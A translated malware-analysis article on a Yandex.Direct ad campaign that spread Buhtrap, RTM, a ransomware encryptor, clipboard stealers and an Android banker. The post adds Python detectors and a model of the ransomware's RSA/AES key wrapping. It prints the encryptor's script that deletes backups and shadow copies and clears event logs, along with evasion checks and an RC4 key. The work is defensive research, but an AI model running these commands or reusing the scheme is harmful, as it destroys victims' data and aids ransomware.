The Buhtrap backdoor and encryptor distributed via Yandex.Direct

To target accountants in a cyberattack, you can use the work documents they search for online. That is roughly what a cyber group did over the past few months, distributing the known Buhtrap and RTM backdoors, as well as encryptors and software for stealing cryptocurrency. Most of the targets are in Russia. The attack was carried out by placing malicious advertisements on Yandex.Direct. Potential victims were directed to a website that asked them to download a malicious file disguised as a document template. Yandex removed the malicious advertising after our warning.

The Buhtrap source code was leaked online in the past, so anyone can use it. We have no information about the availability of the RTM code.

In this post we describe how the attackers distributed malware using Yandex.Direct and hosted it on GitHub. The post concludes with a technical analysis of the malware.


Buhtrap and RTM are back in business

Distribution method and victims

The various payloads delivered to the victims share a common distribution mechanism. All malicious files created by the attackers were placed in two different GitHub repositories.

Typically, a repository contained a single downloadable malicious file, which was changed frequently. Because GitHub lets you view the change history of a repository, we could see which malware was distributed during a given period. To convince the victim to download the malicious file, the website blanki-shabloni24[.]ru, shown in the figure above, was used.

The site design and all of the malicious file names follow a single theme: forms, templates, contracts, samples, and so on. The same plan is used in the new campaign. The only question was how the victim ended up on the attackers' site.

Infection

At least some of the victims who ended up on this site were lured there by malicious advertising. Below is an example URL:

https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=скачать бланк счета&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456

As you can see from the link, the banner was placed on the legitimate accounting forum bb.f2[.]kz. It is important to note that the banners appeared on various sites, all of them had the same campaign id (blanki_rsya), and most were related to accounting or legal assistance services. The URL shows that the potential victim used the search query "download invoice form", which supports our hypothesis of targeted attacks. Below are the sites on which the banners appeared and the corresponding search queries.

  • download invoice form - bb.f2[.]kz
  • sample contract - Ipopen[.]ru
  • sample complaint - 77metrov[.]ru
  • contract form - blank-dogovor-kupli-prodazhi[.]ru
  • sample court petition - zen.yandex[.]ru
  • sample complaint - yurday[.]ru
  • sample contract forms - Regforum[.]ru
  • contract form - assistentus[.]ru
  • sample apartment agreement - napravah[.]com
  • sample legal contract - avito[.]ru

The site blanki-shabloni24[.]ru may have been set up to pass a simple visual check. Typically, an advertisement that points to a professional-looking website with a link to GitHub does not look like anything malicious. In addition, the attackers uploaded malicious files to the repository only for a limited period, probably for the duration of the campaign. Most of the time, the GitHub repository contained an empty zip archive or an empty EXE file. Thus, the attackers could distribute advertising through Yandex.Direct on sites that were most likely visited by accountants arriving from specific search queries.

Next, let's look at the various payloads distributed this way.

Payload analysis

Distribution timeline

The malicious campaign began at the end of October 2018 and was still active at the time of writing. Because the entire repository was publicly available on GitHub, we compiled an accurate timeline of the distribution of the six malware families (see the figure below). We have added a line showing when the banner link was first seen, as measured by ESET telemetry, for comparison with the git history. As you can see, this correlates well with the availability of the payload on GitHub. The discrepancy at the end of February can be explained by the fact that we did not have part of the change history, because the repository was removed from GitHub before we could retrieve it in full.

Figure 1. Malware distribution timeline.

Code signing certificates

The campaign used several code signing certificates. Some of them signed more than one malware family, which further indicates that the different samples belong to the same campaign. Despite having the private key, the operators did not systematically sign the binaries and did not use the key for all samples. At the end of February 2019, the attackers began producing invalid signatures using a Google certificate for which they did not have the private key.

All certificates involved in the campaign and the malware families they sign are listed in the table below.

[Table: code signing certificates and the malware families they sign. The table was an image and is not reproduced here.]

We also used these code signing certificates to look for links with other malware families. For most of the certificates, we found no samples that were not distributed via a GitHub repository. However, the TOV "MARIYA" certificate was used to sign malware belonging to the Wauchos botnet, adware and miners. It appears that this malware is connected to this campaign. Apparently, the certificate was bought on the darknet.

Win32/Filecoder.Buhtrap

The first component that caught our attention was the newly discovered Win32/Filecoder.Buhtrap. It is a Delphi binary that is sometimes packed. It was mostly distributed in February and March 2019. It behaves the way ransomware is expected to: it searches local drives and network shares and encrypts the files it finds. It does not need an Internet connection to compromise a machine, because it does not contact a server to send encryption keys. Instead, it appends a "token" to the end of the ransom message and suggests using email or Bitmessage to contact the operators.

To encrypt as many sensitive resources as possible, Filecoder.Buhtrap runs a thread designed to shut down key software that may hold open handles on files containing valuable data, since such handles would interfere with encryption. The targeted processes are mainly database management systems (DBMS). In addition, Filecoder.Buhtrap deletes log files and backups to hinder data recovery. To do this, it executes the batch script below.

bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"
attrib "%userprofile%\documents\Default.rdp" -s -h
del "%userprofile%\documents\Default.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled
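The command sequence above is noisy from a detection standpoint: each line is a legitimate administrative tool, but seeing several of them spawned by one parent within seconds is rarely benign. The following Python detector is an added example written for this post, not code from the article or from ESET; it runs over constructed process-creation log lines (the key=value format, host names and PIDs are invented for the demonstration) and raises a finding when children of the same parent process hit two or more of the command categories from the script within a 60-second window.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample process-creation events (not real telemetry). One line per
# process start: ISO timestamp, host, pid, parent pid, full command line.
SAMPLE_EVENTS = [
    '2019-03-05T10:12:01 host=WS01 pid=4412 ppid=3120 cmd="bcdedit /set {default} recoveryenabled no"',
    '2019-03-05T10:12:01 host=WS01 pid=4416 ppid=3120 cmd="vssadmin delete shadows /all /quiet"',
    '2019-03-05T10:12:02 host=WS01 pid=4420 ppid=3120 cmd="wmic shadowcopy delete"',
    '2019-03-05T10:12:02 host=WS01 pid=4424 ppid=3120 cmd="wevtutil.exe clear-log Security"',
    '2019-03-05T10:12:03 host=WS01 pid=4428 ppid=3120 cmd="sc config eventlog start=disabled"',
    '2019-03-05T11:40:10 host=WS02 pid=988 ppid=612 cmd="vssadmin list shadows"',
    '2019-03-05T11:40:11 host=WS02 pid=990 ppid=612 cmd="notepad.exe C:\\Users\\a\\notes.txt"',
    '2019-03-06T08:00:00 host=WS03 pid=1200 ppid=700 cmd="wevtutil.exe clear-log Application"',
]

# One rule per category of the script: backup/recovery sabotage, event log
# clearing, disabling the event log service, and wiping RDP connection history.
RULES = [
    ("inhibit_recovery", re.compile(
        r"vssadmin(\.exe)?\s+delete\s+shadows"
        r"|wmic(\.exe)?\s+shadowcopy\s+delete"
        r"|bcdedit(\.exe)?\s+/set\s+\{default\}\s+(recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)"
        r"|wbadmin(\.exe)?\s+delete\s+(catalog|systemstatebackup|backup)", re.I)),
    ("clear_event_logs", re.compile(
        r"wevtutil(\.exe)?\s+(cl|clear-log)\s+(application|security|system)\b", re.I)),
    ("disable_event_logging", re.compile(
        r"sc(\.exe)?\s+config\s+eventlog\s+start=\s*disabled", re.I)),
    ("wipe_rdp_history", re.compile(
        r"reg(\.exe)?\s+delete\s+\"?HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client"
        r"|del\s+\"?%userprofile%\\documents\\Default\.rdp", re.I)),
]

LINE = re.compile(r'^(?P<ts>\S+) host=(?P<host>\S+) pid=(?P<pid>\d+) ppid=(?P<ppid>\d+) cmd="(?P<cmd>.*)"$')


def parse(line):
    """Parse one constructed log line into a dict, or return None if it does not match."""
    m = LINE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.fromisoformat(ev["ts"])
    return ev


def match_rules(cmd):
    """Return the names of all rule categories that the command line matches."""
    return [name for name, rx in RULES if rx.search(cmd)]


def find_recovery_sabotage(lines, window=timedelta(seconds=60), min_categories=2):
    """Group rule hits by (host, parent pid); report each parent whose children
    cover at least `min_categories` distinct categories inside one `window`."""
    hits = defaultdict(list)
    for line in lines:
        ev = parse(line)
        if not ev:
            continue
        for name in match_rules(ev["cmd"]):
            hits[(ev["host"], ev["ppid"])].append((ev["ts"], name, ev["cmd"]))

    findings = []
    for (host, ppid), evs in hits.items():
        evs.sort()
        for i, (t0, _, _) in enumerate(evs):
            in_window = [e for e in evs[i:] if e[0] - t0 <= window]
            categories = sorted({e[1] for e in in_window})
            if len(categories) >= min_categories:
                findings.append({"host": host, "ppid": ppid, "categories": categories,
                                 "commands": [e[2] for e in in_window]})
                break  # one finding per parent is enough
    return findings


if __name__ == "__main__":
    for f in find_recovery_sabotage(SAMPLE_EVENTS):
        print(f["host"], "parent", f["ppid"], "->", ", ".join(f["categories"]))
```

The single `wevtutil clear-log Application` on WS03 and the read-only `vssadmin list shadows` on WS02 are deliberately left below the threshold, so the rule fires only on the clustered sequence the script produces. In a real deployment the same logic maps onto Sysmon event ID 1 or Windows security event 4688, with the parent process name as an additional field to report.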

Filecoder.Buhtrap uses the IP Logger online service, which is designed to collect information about website visitors. Here it is meant to keep track of the ransomware's victims, which is the job of the following command line:

mshta.exe "javascript:document.write('');"

Files are selected for encryption if they do not match three exclusion lists. First, files with the following extensions are not encrypted: .com, .cmd, .cpl, .dll, .exe, .hta, .lnk, .msc, .msi, .msp, .pif, .scr, .sys and .bat. Second, all files whose full path contains one of the directory strings from the list below are excluded.

.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
googlechrome
google
boot
application data
apple computer\safari
appdata
all users
:\windows
:\system volume information
:\nvidia
:\intel

Third, certain file names are excluded from encryption, including the file name of the ransom message. The list is given below. Clearly, all of these exclusions are intended to keep the machine bootable, but with as little usability as possible.

boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe

File encryption scheme

Once executed, the malware generates a 512-bit RSA key pair. The private exponent (d) and the modulus (n) are then encrypted with a hard-coded 2048-bit public key (public exponent and modulus), zlib-compressed and base64-encoded. The code responsible for this is shown in Figure 2.

Figure 2. Hex-Rays decompilation of the 512-bit RSA key pair generation routine.

Below is an example of the plaintext of a generated private key, that is, the token appended to the ransom message.

DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239

The attackers' public key is given below.

e = …
n = …

Files are encrypted using AES-128-CBC with a 256-bit key. For each encrypted file, a new key and a new initialization vector are generated. The key information is appended to the end of the encrypted file. Let's look at the format of an encrypted file.
Encrypted files have the following header:

[Image: encrypted-file header layout; not reproduced here.]

The file data, with the VEGA magic value prepended, is encrypted up to the first 0x5000 bytes. All of the decryption information is appended to the file in the following structure:

[Image: layout of the decryption information appended to each encrypted file; not reproduced here.]

- The file size marker contains a flag indicating whether the file is larger than 0x5000 bytes
- AES key blob = ZlibCompress(RSAEncrypt(AES key + IV, public key of the generated RSA key pair))
- RSA key blob = ZlibCompress(RSAEncrypt(generated RSA private key, hard-coded RSA public key))
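The two blobs above form a two-level key hierarchy: the per-file AES key and IV are recoverable only with the per-victim 512-bit private key, and that private key travels in the ransom-note token encrypted under the operators' 2048-bit public key, so nothing on the victim's disk is sufficient to decrypt the files. The following Python model is an added example written for this post, not the malware's code or ESET's; it reproduces the wrapping structure described above using textbook (unpadded) RSA, a Miller-Rabin prime generator and the standard library only. The padding scheme, the byte order of d and n inside the token, and the absence of base64 on the per-file blob are assumptions, since the article does not specify them; the AES file encryption itself is not modelled, only the key material that would drive it.

```python
import base64
import os
import random
import zlib

# Odd primes below 2000 for quick trial division before Miller-Rabin.
SMALL_PRIMES = [p for p in range(3, 2000, 2)
                if all(p % q for q in range(3, int(p ** 0.5) + 1, 2))]

VICTIM_BITS, OPERATOR_BITS = 512, 2048   # key sizes stated in the article
VB = VICTIM_BITS // 8                     # 64 bytes for d and for n


def is_probable_prime(n, rounds=24):
    """Trial division followed by `rounds` Miller-Rabin rounds with random bases."""
    if n < 2 or n % 2 == 0:
        return n == 2
    for p in SMALL_PRIMES:
        if n % p == 0:
            return n == p
    d, r = n - 1, 0
    while d % 2 == 0:
        d //= 2
        r += 1
    rng = random.SystemRandom()
    for _ in range(rounds):
        x = pow(rng.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def gen_prime(bits):
    """Random prime with its top two bits set, so p*q has exactly 2*bits bits."""
    rng = random.SystemRandom()
    while True:
        c = rng.getrandbits(bits) | (1 << (bits - 1)) | (1 << (bits - 2)) | 1
        if is_probable_prime(c):
            return c


def gen_rsa(bits, e=65537):
    """Return ((e, n), (d, n)) with an n of exactly `bits` bits."""
    while True:
        p, q = gen_prime(bits // 2), gen_prime(bits // 2)
        n, phi = p * q, (p - 1) * (q - 1)
        if p != q and n.bit_length() == bits and phi % e:
            return (e, n), (pow(e, -1, phi), n)


def rsa_raw(data, key, out_len=None):
    """Textbook RSA on a big-endian integer (assumption: the real padding is not described)."""
    exp, n = key
    m = int.from_bytes(data, "big")
    if m >= n:
        raise ValueError("input does not fit under the modulus")
    out_len = out_len or (n.bit_length() + 7) // 8
    return pow(m, exp, n).to_bytes(out_len, "big")


def wrap_victim_private_key(victim_priv, operator_pub):
    """Ransom-note token: base64(zlib(RSA_operator(d || n)))."""
    d, n = victim_priv
    blob = d.to_bytes(VB, "big") + n.to_bytes(VB, "big")  # 128 bytes, fits under 2048-bit n
    return base64.b64encode(zlib.compress(rsa_raw(blob, operator_pub)))


def unwrap_victim_private_key(token, operator_priv):
    """Operator side: recover (d, n) of the victim key pair from the token."""
    blob = rsa_raw(zlib.decompress(base64.b64decode(token)), operator_priv, 2 * VB)
    return int.from_bytes(blob[:VB], "big"), int.from_bytes(blob[VB:], "big")


def wrap_file_key(aes_key, iv, victim_pub):
    """Per-file trailer blob: zlib(RSA_victim(key || iv))."""
    return zlib.compress(rsa_raw(aes_key + iv, victim_pub))


def unwrap_file_key(blob, victim_priv):
    raw = rsa_raw(zlib.decompress(blob), victim_priv, 32 + 16)
    return raw[:32], raw[32:]


def demo(operator_bits=OPERATOR_BITS):
    """Walk the whole chain once and report whether the recovery path round-trips."""
    operator_pub, operator_priv = gen_rsa(operator_bits)   # held only by the operators
    victim_pub, victim_priv = gen_rsa(VICTIM_BITS)          # generated on the victim at run time
    note_token = wrap_victim_private_key(victim_priv, operator_pub)
    aes_key, iv = os.urandom(32), os.urandom(16)           # fresh per-file key material
    trailer_blob = wrap_file_key(aes_key, iv, victim_pub)
    # Recovery is only possible starting from the operator private key.
    recovered_priv = unwrap_victim_private_key(note_token, operator_priv)
    rk, riv = unwrap_file_key(trailer_blob, recovered_priv)
    return {"note_token": note_token, "trailer_len": len(trailer_blob),
            "key_ok": rk == aes_key and riv == iv}


if __name__ == "__main__":
    print(demo())
```

Two observations fall out of the model: 48 bytes of AES key plus IV fit under a 512-bit modulus and 128 bytes of d plus n fit under a 2048-bit one, which is why these key sizes suffice for the scheme without any hybrid layer in between; and because no key leaves the machine, an analyst who obtains the ransom-note token still needs the operators' private key to get anywhere, which is exactly the property the article points out when it notes that no Internet connection is required.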

Win32/ClipBanker

Win32/ClipBanker is a component that was distributed intermittently from late October to early December 2018. Its role is to monitor the contents of the clipboard, looking for cryptocurrency wallet addresses. Having detected a target wallet address, ClipBanker replaces it with an address believed to belong to the operators. The samples we examined were neither packed nor obfuscated. The only mechanism used to mask its behaviour is string encryption. The operators' wallet addresses are encrypted with RC4. The targeted cryptocurrencies are Bitcoin, Bitcoin Cash, Dogecoin, Ethereum and Ripple.

During the period in which the malware was spreading, only a small amount of BTC was sent to the attackers' Bitcoin wallets, which casts doubt on the success of the campaign. Moreover, there is no evidence that these transactions are related to ClipBanker at all.

Win32/RTM

The Win32/RTM component was distributed for a few days in early March 2019. RTM is a banking Trojan written in Delphi that targets remote banking systems. In 2017, ESET researchers published a detailed analysis of this program, and that description is still relevant. In January 2019, Palo Alto Networks also released a blog post about RTM.

Buhtrap Loader

For some time, a downloader was available on GitHub that does not resemble the earlier Buhtrap tools. It contacts https://94.100.18[.]67/RSS.php?<some_id> to fetch the next stage and loads it directly into memory. We can distinguish two behaviours of this second-stage code. In the first, RSS.php delivered the Buhtrap backdoor directly; this backdoor is very similar to the one that became available after the source code leak.

Interestingly, we see several campaigns using the Buhtrap backdoor, and they are believed to be run by different operators. In this case, the main difference is that the backdoor is loaded directly into memory and does not use the usual scheme with the DLL deployment process that we discussed earlier. In addition, the operators changed the RC4 key used to encrypt network traffic to the C&C server. In most of the campaigns we have seen, the operators did not bother to change this key.

In the second, more complex behaviour, the RSS.php URL delivered another loader. It implemented some obfuscation, such as rebuilding the import table. The purpose of this loader is to contact the C&C server msiofficeupd[.]com/api/F27F84EDA4D13B15/2, send logs and wait for a response. It treats the response as a blob, loads it into memory and executes it. The payload we saw executed by this loader was the same Buhtrap backdoor, but there may be other components.

Android/Spy.Banker

Interestingly, a component for Android was also found in the GitHub repository. It was in the master branch for only one day, November 1, 2018. Apart from its publication on GitHub, ESET telemetry shows no evidence of this malware being distributed.

The component was hosted as an Android Application Package (APK). It is heavily obfuscated. The malicious behaviour is hidden inside an encrypted JAR embedded in the APK. It is encrypted with RC4 using this key:

key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]

The same key and algorithm are used to encrypt strings. The JAR is located at APK_ROOT + image/files. The first 4 bytes of that file hold the length of the encrypted JAR, which begins immediately after the length field.
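An analyst who wants the embedded JAR out of the APK needs exactly three things the article gives: the container layout (4-byte length, then ciphertext), the algorithm (RC4) and the key printed above. The following Python extractor is an added example written for this post, not the malware's code or ESET's tooling; it implements RC4 from scratch so it runs without third-party packages. The byte order of the length field is not stated in the article and is assumed to be little-endian (a parameter lets you flip it), and the sample container is constructed inline from a tiny throwaway ZIP so the example can run offline.

```python
import io
import struct
import zipfile

# RC4 key recovered from the sample, as printed in the article.
RC4_KEY = bytes([
    0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
    0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
    0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96,
])


def rc4(key, data):
    """Plain RC4 (KSA + PRGA); encryption and decryption are the same operation."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for b in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(b ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def extract_jar(container, key=RC4_KEY, little_endian=True):
    """Parse the image/files blob: 4-byte length, then the RC4-encrypted JAR.
    Byte order of the length is an assumption; the ZIP magic check catches a wrong guess."""
    if len(container) < 4:
        raise ValueError("container too short to hold a length field")
    (length,) = struct.unpack("<I" if little_endian else ">I", container[:4])
    body = container[4:4 + length]
    if len(body) != length:
        raise ValueError(f"length field says {length} bytes but only {len(body)} follow")
    jar = rc4(key, body)
    if not jar.startswith(b"PK\x03\x04"):
        raise ValueError("decrypted payload is not a ZIP/JAR (wrong key or byte order?)")
    return jar


def jar_entries(jar):
    """Names of the entries inside a decrypted JAR, for a quick sanity check."""
    with zipfile.ZipFile(io.BytesIO(jar)) as zf:
        return zf.namelist()


def decrypt_string(blob, key=RC4_KEY):
    """The article states the app's strings use the same key and algorithm."""
    return rc4(key, blob).decode("utf-8", errors="replace")


def make_sample_container():
    """Constructed fixture only: a minimal JAR wrapped the way the article describes.
    Returns (container_bytes, plaintext_jar). Not derived from the real sample."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("classes.dex", b"dex\n035\x00placeholder")
    jar = buf.getvalue()
    return struct.pack("<I", len(jar)) + rc4(RC4_KEY, jar), jar


if __name__ == "__main__":
    container, _ = make_sample_container()
    print(jar_entries(extract_jar(container)))
```

On a real APK you would read `image/files` out of the archive with `zipfile` and pass its bytes to `extract_jar`; if the ZIP magic check fails, try `little_endian=False` before suspecting the key.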

After decrypting the file, we found it to be Anubis, a previously documented banker for Android. The malware has the following capabilities:

  • record audio from the microphone
  • take screenshots
  • obtain GPS coordinates
  • keylogging
  • encrypt device data and demand a ransom
  • send spam

Interestingly, the banker used Twitter as a backup communication channel to obtain another C&C server. The sample we analysed used the @JonesTrader account, but at the time of analysis it had already been blocked.

The banker contains a list of target applications on the Android device. It is longer than the list obtained in the Sophos study. The list includes many banking applications, online shopping apps such as Amazon and eBay, and cryptocurrency services.

MSIL/ClipBanker.IH

The last component distributed as part of this campaign was a .NET Windows executable that appeared in March 2019. Most of the versions examined were packed with ConfuserEx v1.0.0. Like ClipBanker, this component targets the clipboard. It aims at a wide range of cryptocurrencies, as well as Steam trade offers. In addition, it uses the IP Logger service to steal Bitcoin private keys in WIF format.

Protection mechanisms

In addition to the anti-debugging, anti-dumping and anti-tampering features that ConfuserEx provides, the component includes the ability to detect antivirus products and virtual machines.

To check whether it is running in a virtual machine, the malware uses the built-in Windows WMI command-line tool (WMIC) to query BIOS information, like so:

wmic bios

The program then parses the command output and looks for the keywords VBOX, VirtualBox, XEN, qemu, bochs and VM.

To detect antivirus products, the malware sends a Windows Management Instrumentation (WMI) query to the Windows Security Center using the ManagementObjectSearcher API, as shown below. After decoding from base64, the call looks like this:

ManagementObjectSearcher('root\SecurityCenter2', 'SELECT * FROM AntivirusProduct')

Figure 3. Code for detecting antivirus products.

In addition, the malware checks whether CryptoClipWatcher, a tool that protects against clipboard attacks, is running and, if so, suspends all threads in that process, thereby disabling the protection.

Persistence

The malware sample we examined copies itself to %APPDATA%\google\updater.exe and sets the "hidden" attribute on the google directory. It then modifies the Software\Microsoft\Windows NT\CurrentVersion\Winlogon\shell value in the Windows registry, adding the path to updater.exe. This way, the malware is executed every time the user logs in.

Malicious behaviour

Like ClipBanker, the malware monitors the contents of the clipboard and looks for cryptocurrency wallet addresses; when one is found, it is replaced with one of the operators' addresses. Below is the list of targeted address types, based on what is found in the code.

BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL

For each address type there is a corresponding regular expression. The STEAM_URL value is used to attack the Steam system, as can be seen from the regular expression that defines it in the buffer:

\b(https://|http://|)steamcommunity.com/tradeoffer/new/?partner=[0-9]+&token=[a-zA-Z0-9]+\b

Exfiltration channel

In addition to replacing addresses in the clipboard, the malware targets the WIF private keys of Bitcoin, Bitcoin Core and Electrum Bitcoin wallets. The program uses iplogger.org as an exfiltration channel for the WIF private key. To do this, the operators embed the private key data in the User-Agent HTTP header, as shown below.

Figure 4. IP Logger console with the exfiltrated data.

The operators did not use iplogger.org to exfiltrate wallets. They probably chose a different method because of the 255-character limit on the User-Agent field displayed in the IP Logger web interface. In the samples we examined, the other exfiltration server was stored in the DiscordWebHook environment variable. Surprisingly, this environment variable is not set anywhere in the code. This suggests that the malware is still under development and that the variable is set on the operator's test machine.

There is another sign that the program is under development. The binary contains two iplogger.org URLs, and both are queried when data is exfiltrated. In the request to one of these URLs, the value of the Referer field is prefixed with "DEV /". We also found a version not packed with ConfuserEx, in which the handler for this URL is named DevFeedbackUrl. Based on the environment variable name, we believe the operators plan to use the legitimate Discord service and its webhook system to steal cryptocurrency wallets.
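Two of the details in this section are cheap to check for from the defender's side: the Winlogon shell value in the Persistence section, which should normally contain nothing but explorer.exe, and outbound requests to iplogger.org whose User-Agent carries a WIF-format key. The following Python audit is an added example written for this post, not ESET's code; it covers both passages with a registry-value checker that works on a string you supply (so it runs anywhere, including on a Linux analysis box) and a proxy-log scanner that runs over constructed Common Log Format lines. The WIF pattern (base58, 51 characters starting with 5, or 52 starting with K or L) is general Bitcoin knowledge rather than something the article states, and the IP Logger path IDs, client addresses and the WIF-like string in the sample log are invented and do not form a valid key.

```python
import os
import re

# Value named in the Persistence section. The article does not say which hive;
# per-user Winlogon overrides live under HKCU. Kept here for reporting only.
WINLOGON_SHELL_VALUE = r"Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell"


def audit_winlogon_shell(value, env=None):
    """Return every entry of a Winlogon Shell value that is not the stock explorer.exe.
    `env` maps variable names such as APPDATA to paths for expanding %VAR% references."""
    env = {k.upper(): v for k, v in (env or {}).items()}
    findings = []
    for entry in (e.strip() for e in value.split(",") if e.strip()):
        expanded = re.sub(r"%(\w+)%", lambda m: env.get(m.group(1).upper(), m.group(0)), entry)
        exe = os.path.basename(expanded.strip('"').replace("\\", "/")).lower()
        if exe == "explorer.exe":
            continue
        reason = "non-default shell entry"
        if "\\appdata\\" in expanded.lower() or "%appdata%" in entry.lower():
            reason += " under user-writable AppData"
        findings.append({"entry": entry, "expanded": expanded, "reason": reason})
    return findings


# Base58 alphabet excludes 0, O, I and l. WIF: '5' + 50 chars (uncompressed key)
# or 'K'/'L' + 51 chars (compressed key). Lookarounds stop it matching inside longer tokens.
_B58 = "[1-9A-HJ-NP-Za-km-z]"
WIF_RE = re.compile(rf"(?<!{_B58})(?:5{_B58}{{50}}|[KL]{_B58}{{51}})(?!{_B58})")

CLF_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+)[^"]*" '
    r'(?P<status>\d+) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')

EXFIL_HOSTS = {"iplogger.org"}

# Constructed proxy log (not real traffic). Path IDs after iplogger.org are placeholders.
SAMPLE_PROXY_LOG = [
    '10.0.0.5 - - [06/Mar/2019:09:15:22 +0000] "GET https://iplogger.org/EXAMPLEID HTTP/1.1" 200 43 "-" '
    '"5JhKv7M8nEPc2wYq9TdzF3bLRgm6xN4sQA1rZ5eXkHuDpWyC8tG"',
    '10.0.0.5 - - [06/Mar/2019:09:15:23 +0000] "GET https://iplogger.org/EXAMPLEID2 HTTP/1.1" 200 43 "DEV /" '
    '"Mozilla/5.0 (Windows NT 10.0) Gecko"',
    '10.0.0.7 - - [06/Mar/2019:09:16:01 +0000] "GET https://www.example.com/ HTTP/1.1" 200 5120 "-" '
    '"Mozilla/5.0 (Windows NT 10.0) Gecko"',
    '10.0.0.9 - - [06/Mar/2019:09:17:40 +0000] "GET https://iplogger.org/EXAMPLEID HTTP/1.1" 200 43 "-" '
    '"Mozilla/5.0 (Windows NT 10.0) Gecko"',
]


def scan_proxy_log(lines):
    """Flag requests to IP Logger: high severity when the User-Agent carries a WIF-format
    key, medium when the request is otherwise non-browser-like or tagged with 'DEV /'."""
    findings = []
    for line in lines:
        m = CLF_RE.match(line)
        if not m:
            continue
        host = re.match(r"https?://([^/:]+)", m["url"])
        host = host.group(1).lower() if host else ""
        if host not in EXFIL_HOSTS:
            continue
        ua, referer = m["ua"], m["referer"]
        if WIF_RE.search(ua):
            findings.append({"src": m["src"], "severity": "high",
                             "why": "WIF-format private key in User-Agent", "ua": ua})
        elif referer.startswith("DEV /") or not ua.startswith("Mozilla/"):
            findings.append({"src": m["src"], "severity": "medium",
                             "why": "non-browser or DEV-tagged request to IP Logger", "ua": ua})
    return findings


if __name__ == "__main__":
    print(audit_winlogon_shell(r"explorer.exe,%APPDATA%\google\updater.exe",
                               env={"APPDATA": r"C:\Users\u\AppData\Roaming"}))
    for f in scan_proxy_log(SAMPLE_PROXY_LOG):
        print(f["severity"], f["src"], f["why"])
```

The plain browser visit to iplogger.org from 10.0.0.9 is intentionally not flagged, since the service has legitimate users; what the scanner keys on is the combination of that destination with a User-Agent that is a key rather than a browser string, or with the "DEV /" marker the article describes.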

Conclusion

This campaign is an example of the use of legitimate advertising services in cyberattacks. The scheme targets Russian organizations, but we would not be surprised to see such an attack using non-Russian services. To avoid compromise, users should make sure of the reputation of the source of the software they download.

A full list of indicators of compromise and MITRE ATT&CK attributes is available at the link.

Source: www.habr.com
